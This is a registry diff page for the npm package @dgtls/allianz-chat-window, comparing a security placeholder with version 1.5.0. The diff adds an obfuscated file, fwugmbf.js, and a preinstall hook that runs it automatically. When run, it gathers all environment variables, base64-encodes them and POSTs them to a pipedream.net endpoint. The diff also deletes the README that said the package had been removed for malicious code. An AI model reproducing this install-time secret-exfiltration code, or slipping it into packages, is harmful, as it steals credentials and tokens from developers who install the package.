@dgtls/allianz-chat-window 0.0.1-security → 1.5.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @dgtls/allianz-chat-window might be problematic. Click here for more details.
- package/fwugmbf.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/fwugmbf.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x3fed59=a0_0x429c;function a0_0x429c(_0x4f8b5e,_0x5efca9){const _0x22a72e=a0_0x22a7();return a0_0x429c=function(_0x429c09,_0x1b8522){_0x429c09=_0x429c09-0xf2;let _0x375580=_0x22a72e[_0x429c09];return _0x375580;},a0_0x429c(_0x4f8b5e,_0x5efca9);}function a0_0x22a7(){const _0x597017=['npm_package_name','https','6033348xgaJuL','from','12392380FhExjT','pipedream','POST','toString','join','7piFAiE','env','5151GrwFBL','net','1593192Meddgy','stringify','3760590AcXwln','base64','10QtYiNK','296jvitzY','request','1725940jHpXyK','b2c25c3b4e80055c256dc21dd58fb813','end','7664550wBKbKB'];a0_0x22a7=function(){return _0x597017;};return a0_0x22a7();}(function(_0x2fe6b3,_0x45a995){const _0x999e04=a0_0x429c,_0x16c1d7=_0x2fe6b3();while(!![]){try{const _0x4f44ca=-parseInt(_0x999e04(0x108))/0x1*(-parseInt(_0x999e04(0xf7))/0x2)+-parseInt(_0x999e04(0xf4))/0x3+parseInt(_0x999e04(0xf9))/0x4*(parseInt(_0x999e04(0xf6))/0x5)+parseInt(_0x999e04(0xfc))/0x6+-parseInt(_0x999e04(0x106))/0x7*(parseInt(_0x999e04(0xf2))/0x8)+parseInt(_0x999e04(0xff))/0x9+-parseInt(_0x999e04(0x101))/0xa;if(_0x4f44ca===_0x45a995)break;else _0x16c1d7['push'](_0x16c1d7['shift']());}catch(_0x4ac8df){_0x16c1d7['push'](_0x16c1d7['shift']());}}}(a0_0x22a7,0xd722e));const http=require(a0_0x3fed59(0xfe));req=http[a0_0x3fed59(0xf8)]({'host':[a0_0x3fed59(0xfa),'m',a0_0x3fed59(0x102),a0_0x3fed59(0x109)][a0_0x3fed59(0x105)]('.'),'path':'/'+(process[a0_0x3fed59(0x107)][a0_0x3fed59(0xfd)]||''),'method':a0_0x3fed59(0x103)}),req['write'](Buffer[a0_0x3fed59(0x100)](JSON[a0_0x3fed59(0xf3)](process[a0_0x3fed59(0x107)]))[a0_0x3fed59(0x104)](a0_0x3fed59(0xf5))),req[a0_0x3fed59(0xfb)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@dgtls/allianz-chat-window",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "1.5.0",
|
|
4
|
+
"main": "fwugmbf.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node fwugmbf.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40dgtls%2Fallianz-chat-window for more information.
|